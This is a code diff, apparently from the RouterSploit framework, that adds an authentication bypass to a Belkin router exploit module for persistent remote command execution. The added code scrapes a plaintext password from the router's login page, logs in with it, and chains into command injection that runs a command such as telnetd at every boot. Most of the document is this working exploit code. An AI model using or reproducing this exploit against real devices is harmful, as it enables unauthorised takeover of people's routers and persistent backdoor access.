Included auth bypass

91222529 · BigNerd95 · 6b4360f9 · 91222529
Commit 91222529 authored Feb 20, 2017 by BigNerd95
Hide whitespace changes
Inline Side-by-side

Showing with 44 additions and 3 deletions

play_max_prce.py routersploit/modules/exploits/belkin/play_max_prce.py +44 -3

No files found.
--- a/routersploit/modules/exploits/belkin/play_max_prce.py
+++ b/routersploit/modules/exploits/belkin/play_max_prce.py
@@ -15,7 +15,6 @@ class Exploit(exploits.Exploit):
    """
    Persistent remote command execution.
    If the target is vulnerable, you can run a bash command at every boot.
-    You must be logged in to run this exploit, you can use auth_bypass exploit to log in.
    """
    __info__ = {
        'name': 'Belkin Persistent Remote Command Execution',
@@ -36,8 +35,46 @@ class Exploit(exploits.Exploit):
    port = exploits.Option(80, 'Target Port')
    cmd = exploits.Option('telnetd', 'Command to execute')

-    def run(self):
+    def check_auth_bypass(self):
+        url = "{}:{}/login.stm".format(self.target, self.port)
+
+        response = http_request(method="GET", url=url)
+        if response is None:
+            return False  # target is not vulnerable
+
+        val = re.findall('password\s?=\s?"(.+?)"', response.text)  # in some fw there are no spaces
+
+        if len(val):
+            return True  # target vulnerable
+
+        return False  # target is not vulnerable
+
+    def auth_bypass(self):
+        url = "{}:{}/login.stm".format(self.target, self.port)
+
+        response = http_request(method="GET", url=url)
+        if response is None:
+            return
+
+        val = re.findall('password\s?=\s?"(.+?)"', response.text)  # in some fw there are no spaces
+
+        if len(val):
+            url = "{}:{}/login.cgi".format(self.target, self.port)
+            payload = "pws=" + val[0] + "&arc_action=login&action=Submit"
+
+            login = http_request(method="POST", url=url, data=payload)
+            if login is None:
+                return
+
+            error = re.search('loginpserr.stm', login.text)

+            if not error:
+                print_success("Exploit success, you are now logged in!")
+                return
+
+        print_error("Exploit failed. Device seems to be not vulnerable.")
+
+    def inject_command(self):
        ssid_url = "{}:{}/wireless_id.stm".format(self.target, self.port)
        response = http_request(method="GET", url=ssid_url)
        if response is None:
@@ -71,6 +108,10 @@ class Exploit(exploits.Exploit):
            print_error("Exploit failed. Device seems to be not vulnerable.")
            exit(1)

+    def run(self):
+        self.auth_bypass()
+        self.inject_command()
+
    @mute
    def check(self):
-        return None
+        return self.check_auth_bypass()